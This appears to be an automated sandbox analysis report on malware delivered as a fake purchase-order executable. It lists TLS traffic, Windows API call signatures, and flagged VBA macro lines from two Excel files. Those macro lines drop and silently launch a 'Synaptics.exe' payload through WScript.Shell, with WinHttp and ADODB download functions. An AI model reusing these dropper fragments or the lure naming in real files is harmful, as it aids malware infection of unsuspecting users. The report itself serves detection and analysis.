                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                                Source: unknownNetwork traffic detected: HTTP traffic on port 50101 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49734 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49735 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49742 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49741 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49745 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49746 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49761 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49760 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49768 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49767 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49781 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49780 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49785 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49784 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49786 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49787 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49797 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49796 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49808 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49809 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49812 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49813 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49815 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49814 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49824 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49823 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49828 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49830 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49839 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49840 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49849 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49848 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49857 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49858 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49867 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49868 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49873 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49874 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49876 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49875 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49889 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49890 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49898 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49899 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49918 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49919 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49938 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49937 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49954 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49955 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49973 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49974 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49985 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49986 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:49988 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:49987 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50005 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50004 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50013 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50015 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50016 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50014 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50029 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50030 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50050 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50049 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50061 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50062 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50079 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50080 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50091 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50089 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50090 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50092 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50110 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50111 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50119 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.97:443 -> 192.168.2.4:50120 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50135 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 142.250.181.14:443 -> 192.168.2.4:50134 version: TLS 1.2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00EF7099
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00EF7294
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000C7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_000C7294
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EF7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,1_2_00EF7099
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,1_2_00EE4342
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00F0F5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_000DF5D0

                                System Summary

                                barindex
                                Document contains an embedded VBA macro with suspicious strings
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: ExL2BsMQ.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                                Source: KATAXZVCPS.xlsm.2.drOLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                                Document contains an embedded VBA with functions possibly related to ADO stream file operations
                                Source: ExL2BsMQ.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Source: KATAXZVCPS.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                                Document contains an embedded VBA with functions possibly related to HTTP operations
                                Source: ExL2BsMQ.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Source: KATAXZVCPS.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                                Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
                                Source: ExL2BsMQ.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Source: KATAXZVCPS.xlsm.2.drStream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA29C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,1_2_00EA29C2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F102AA NtdllDialogWndProc_W,1_2_00F102AA
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0E769 NtdllDialogWndProc_W,CallWindowProcW,1_2_00F0E769
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0EA4E NtdllDialogWndProc_W,1_2_00F0EA4E
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0ECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,1_2_00F0ECBC
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBAC99 NtdllDialogWndProc_W,1_2_00EBAC99
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBAD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,1_2_00EBAD5C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0EFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,1_2_00F0EFA8
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBAFB4 GetParent,NtdllDialogWndProc_W,1_2_00EBAFB4
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F0A1 SendMessageW,NtdllDialogWndProc_W,1_2_00F0F0A1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,1_2_00F0F122
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F3DA NtdllDialogWndProc_W,1_2_00F0F3DA
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F3AB NtdllDialogWndProc_W,1_2_00F0F3AB
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F37C NtdllDialogWndProc_W,1_2_00F0F37C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F45A ClientToScreen,NtdllDialogWndProc_W,1_2_00F0F45A
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F425 NtdllDialogWndProc_W,1_2_00F0F425
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_00F0F5D0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0F594 GetWindowLongW,NtdllDialogWndProc_W,1_2_00F0F594
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBB7F2 NtdllDialogWndProc_W,1_2_00EBB7F2
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EBB845 NtdllDialogWndProc_W,1_2_00EBB845
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0FE80 NtdllDialogWndProc_W,1_2_00F0FE80
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0FF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,1_2_00F0FF91
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0FF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,1_2_00F0FF04
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000729C2 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,9_2_000729C2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000E02AA NtdllDialogWndProc_W,9_2_000E02AA
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DE769 NtdllDialogWndProc_W,CallWindowProcW,9_2_000DE769
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DEA4E NtdllDialogWndProc_W,9_2_000DEA4E
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008AC99 NtdllDialogWndProc_W,9_2_0008AC99
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DECBC PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,9_2_000DECBC
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008AD5C NtdllDialogWndProc_W,745EC8D0,NtdllDialogWndProc_W,9_2_0008AD5C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DEFA8 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,9_2_000DEFA8
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008AFB4 GetParent,NtdllDialogWndProc_W,9_2_0008AFB4
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF0A1 SendMessageW,NtdllDialogWndProc_W,9_2_000DF0A1
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF122 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,9_2_000DF122
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF37C NtdllDialogWndProc_W,9_2_000DF37C
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF3AB NtdllDialogWndProc_W,9_2_000DF3AB
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF3DA NtdllDialogWndProc_W,9_2_000DF3DA
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF425 NtdllDialogWndProc_W,9_2_000DF425
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF45A ClientToScreen,NtdllDialogWndProc_W,9_2_000DF45A
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF594 GetWindowLongW,NtdllDialogWndProc_W,9_2_000DF594
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DF5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,9_2_000DF5D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008B7F2 NtdllDialogWndProc_W,9_2_0008B7F2
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_0008B845 NtdllDialogWndProc_W,9_2_0008B845
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DFE80 NtdllDialogWndProc_W,9_2_000DFE80
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DFF04 GetClientRect,GetCursorPos,ScreenToClient,NtdllDialogWndProc_W,9_2_000DFF04
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000DFF91 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,9_2_000DFF91
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE70AE: CreateFileW,DeviceIoControl,CloseHandle,1_2_00EE70AE
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EDB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74AF5590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,1_2_00EDB9F1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_00EE82D0
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeCode function: 9_2_000B82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,9_2_000B82D0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EB2B401_2_00EB2B40
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F030AD1_2_00F030AD
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EB36801_2_00EB3680
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EADCD01_2_00EADCD0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EAA0C01_2_00EAA0C0
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC01831_2_00EC0183
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EE220C1_2_00EE220C
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA85301_2_00EA8530
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA66701_2_00EA6670
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC06771_2_00EC0677
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00ED87791_2_00ED8779
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00F0A8DC1_2_00F0A8DC
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EC0A8F1_2_00EC0A8F
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeCode function: 1_2_00EA6BBC1_2_00EA6BBC
